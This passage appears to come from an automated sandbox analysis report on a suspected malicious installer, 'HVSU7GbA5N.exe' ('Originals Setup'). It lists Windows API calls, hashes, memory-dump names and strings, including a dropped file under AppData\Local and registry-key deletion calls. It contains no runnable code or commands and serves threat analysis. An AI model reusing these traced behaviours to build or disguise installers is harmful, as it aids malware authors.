• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: "C:\Users\user\Desktop\HVSU7GbA5N.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-3172565213
• Opcode ID: 936ec53846ae3d4c979f0b86072daa16fddb5806f2a9e6e631d156a7122fd3c6
• Instruction ID: a4a2cc105071513804232ace241bb9437e981183223a596247e33b0ed04e6b88
• Opcode Fuzzy Hash: 936ec53846ae3d4c979f0b86072daa16fddb5806f2a9e6e631d156a7122fd3c6
• Instruction Fuzzy Hash: F111C461805B9129FB3217248C44B776F89CB96B60F18047BE5C4B22C3D77C5E428EAD
APIs
• GetWindowLongA.USER32(?,000000EB), ref: 00403EF7
• GetSysColor.USER32(00000000), ref: 00403F13
• SetTextColor.GDI32(?,00000000), ref: 00403F1F
• SetBkMode.GDI32(?,?), ref: 00403F2B
• GetSysColor.USER32(?), ref: 00403F3E
• SetBkColor.GDI32(?,?), ref: 00403F4E
• DeleteObject.GDI32(?), ref: 00403F68
• CreateBrushIndirect.GDI32(?), ref: 00403F72
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
• Instruction ID: d122295a95d7a35518708bb3646b4b032600d4a0088814026e1a2530b61c3467
• Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
• Instruction Fuzzy Hash: 04218471904705ABC7219F68DD08B4BBFF8AF01715F048A29E996E22E1D738EA44CB55
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
• GlobalFree.KERNEL32(?), ref: 0040272C
• WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
• GlobalFree.KERNEL32(00000000), ref: 00402745
• CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: Global$AllocFileFree$CloseDeleteHandleWrite
• String ID:
• API String ID: 3294113728-0
• Opcode ID: 5456bc62459d66cde3aa9345bf3e569abf4febe9e7b849f405182c4fab6697a6
• Instruction ID: 62ce17ec0f4375d45857f5132ba240fdd0ea0b04a4fb9e1f6e2a0a3b4674b9fe
• Opcode Fuzzy Hash: 5456bc62459d66cde3aa9345bf3e569abf4febe9e7b849f405182c4fab6697a6
• Instruction Fuzzy Hash: B6319C71C00128BBDF216FA5CD89DAE7E79EF09364F10423AF920762E0C7795D419BA9
APIs
• SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040478C
• GetMessagePos.USER32 ref: 00404794
• ScreenToClient.USER32(?,?), ref: 004047AE
• SendMessageA.USER32(?,00001111,00000000,?), ref: 004047C0
• SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
• Instruction ID: 7320c3ca21a199b12554e0b126592fdbaa3119cb9dfe1c5a5544a419b0626cb6
• Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
• Instruction Fuzzy Hash: 7B019275D00218BADB00DB94DC85FFEBBBCAF45711F10412BBA11B71C0C3B465018BA5
APIs
• lstrlenA.KERNEL32(Originals Setup: Completed,Originals Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404582,000000DF,00000000,00000400,?), ref: 00404705
• wsprintfA.USER32 ref: 0040470D
• SetDlgItemTextA.USER32(?,Originals Setup: Completed), ref: 00404720
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s$Originals Setup: Completed
• API String ID: 3540041739-3424068493
• Opcode ID: 2fef8783583e05583b13a3a111104ffe67f6f47bd1d4956f9e9fcfce1648db61
• Instruction ID: bb6c02d87b5a590dcf5e60bd08fb8011c89fc701b4454ccbd5a96a7ae09536e5
• Opcode Fuzzy Hash: 2fef8783583e05583b13a3a111104ffe67f6f47bd1d4956f9e9fcfce1648db61
• Instruction Fuzzy Hash: 6F11E773A041283BDB00666D9C41EAF3298DB82374F250637FA26F71D1F9799C1296E9
APIs
• SetWindowTextA.USER32(00000000,Originals Setup), ref: 0040396B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: TextWindow
• String ID: "C:\Users\user\Desktop\HVSU7GbA5N.exe"$1033$Originals Setup$Originals Setup: Completed
• API String ID: 530164218-2537810721
• Opcode ID: 5114115a6ebe5231764a3ce4d605c7881d7ff0c1eb634beed4f1a3f33a5eb945
• Instruction ID: 871d24c221ce82b24610d398d310ce84231420a4e1270a2a5acaa8ae42907246
• Opcode Fuzzy Hash: 5114115a6ebe5231764a3ce4d605c7881d7ff0c1eb634beed4f1a3f33a5eb945
                                                                                                                                            • Instruction Fuzzy Hash: 8511C6B1B046116BCB30DF55DC80A737BADEB85716364813FE802673A0D77DAD039A68
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
                                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                            • Opcode ID: 82858c02e32d41fd7ca38c30764bbd1566dd555d0b274e926b0c66c461654363
                                                                                                                                            • Instruction ID: 7e4692ed1c3e967feaf617caf8b683db29fbfa99fde863b1c96f6eb31ad0523a
                                                                                                                                            • Opcode Fuzzy Hash: 82858c02e32d41fd7ca38c30764bbd1566dd555d0b274e926b0c66c461654363
                                                                                                                                            • Instruction Fuzzy Hash: C8114C71A00109FFDF21AF90DE49DAB3B7DEB54349B104136FA05B10A0DBB49E51AF69
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?), ref: 00401CD0
                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                                                                                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                                                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                            • Opcode ID: 3fa910a29a7471df273f3d5a519cdd9490650a943fe2164337c26205f225f611
                                                                                                                                            • Instruction ID: f51ac8410cbf6ce335f498807c5bd2b5625ae864585cec2d5bc31dfd5d98a64c
                                                                                                                                            • Opcode Fuzzy Hash: 3fa910a29a7471df273f3d5a519cdd9490650a943fe2164337c26205f225f611
                                                                                                                                            • Instruction Fuzzy Hash: 6DF012B2A05115BFE701EBA4EE89DAF77BCEB44301B109576F501F2191C7789D018B79
                                                                                                                                            APIs
                                                                                                                                            • GetDC.USER32(?), ref: 00401D29
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                                                                                                            • CreateFontIndirectA.GDI32(0040A7B8), ref: 00401DA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3808545654-0
                                                                                                                                            • Opcode ID: 6c97ca4c977f86aacd357c2655dec619d2d0312ab6bad79a0316e8acbd74949c
                                                                                                                                            • Instruction ID: e98614b17e7a5d10a155c4b6304f3e92ae7defc274e3a3420abb617ebef8a141
                                                                                                                                            • Opcode Fuzzy Hash: 6c97ca4c977f86aacd357c2655dec619d2d0312ab6bad79a0316e8acbd74949c
                                                                                                                                            • Instruction Fuzzy Hash: E3018671958340AFEB015BB4AE0ABAA3FB4E715705F208439F142B72E2C57854159B2F
                                                                                                                                            APIs
                                                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                                                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                            • String ID: !
                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                            • Opcode ID: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
                                                                                                                                            • Instruction ID: aec06c1df61e239cd4f76122eecd213935ad84fca4bb147c4325ce067fac4872
                                                                                                                                            • Opcode Fuzzy Hash: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
                                                                                                                                            • Instruction Fuzzy Hash: B82190B1A44208BFEF41AFB4CE4AAAE7BB5EF40344F14453EF541B61D1D6B89A40D728
                                                                                                                                            APIs
                                                                                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405653
                                                                                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 0040565C
                                                                                                                                            • lstrcatA.KERNEL32(?,00409014), ref: 0040566D
                                                                                                                                            Strings
                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040564D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                            • API String ID: 2659869361-4083868402
                                                                                                                                            • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                                                                                            • Instruction ID: 2c4b20d64583e31d373f24845ccb5b94779d1f5d03349b34bc7780515f720d37
                                                                                                                                            • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                                                                                            • Instruction Fuzzy Hash: 17D0A9626059306AE20223269C05E8B3A58CF02315B040423F200B22A2C73C2D418BFE
                                                                                                                                            APIs
                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,00402DA5,00000001), ref: 00402BD8
                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402BF6
• CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C13
• ShowWindow.USER32(00000000,00000005), ref: 00402C21
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: a370bf3714c6657f4aa9727f83cb14b3507f4001cbab91db9230ec4a81342bf5
• Instruction ID: 413067c0dd52ceff9b3bae724ffe8751623181a8cae7bdb8b5040e0cc41620bd
• Opcode Fuzzy Hash: a370bf3714c6657f4aa9727f83cb14b3507f4001cbab91db9230ec4a81342bf5
• Instruction Fuzzy Hash: 43F05E7094A220ABC6216F20BE8CD9F7BBCF704B52B124876F104B12E4D678D8C1DB9C
APIs
• IsWindowVisible.USER32(?), ref: 00404E49
• CallWindowProcA.USER32(?,?,?,?), ref: 00404E9A
  • Part of subcall function 00403EBF: SendMessageA.USER32(00010458,00000000,00000000,00000000), ref: 00403ED1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: ac110b3b9cb7c9f01e5231f91087d53fe1146d3d93b6dd99ce465d5e78f5ea73
• Instruction ID: b130d42bb84d5447e475eed3bbf3cd484b2354f0b63da773ba138cf1eceff29e
• Opcode Fuzzy Hash: ac110b3b9cb7c9f01e5231f91087d53fe1146d3d93b6dd99ce465d5e78f5ea73
• Instruction Fuzzy Hash: CB015EB1500208ABDF219F61DC80AAB3A2AF7C5760F60413BFE04762D1D73A9D51E6E9
APIs
• lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
• WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\choktallenes\sprgekasserne.Tek,00000000,?,?,00000000,00000011), ref: 0040250E
Strings
• C:\Users\user\AppData\Local\choktallenes\sprgekasserne.Tek, xrefs: 004024DD, 00402502
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: FileWritelstrlen
• String ID: C:\Users\user\AppData\Local\choktallenes\sprgekasserne.Tek
• API String ID: 427699356-422593886
• Opcode ID: f14869ca4b55f34734d9d1f256202a330c9e6f196b87c06b0e297acaa7f48907
• Instruction ID: 4e81b00b1a0a83b1a618d6832a3b29c213d1c25728c37480281a976930c2fc19
• Opcode Fuzzy Hash: f14869ca4b55f34734d9d1f256202a330c9e6f196b87c06b0e297acaa7f48907
• Instruction Fuzzy Hash: DEF089B2A14144BFDB40EBA49E49EAB7764DB40308F10443BB141F61C2D6FC5941DB7D
APIs
• FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75573410,00403551,00403375,?), ref: 00403593
• GlobalFree.KERNEL32(00000000), ref: 0040359A
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 0040358B
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
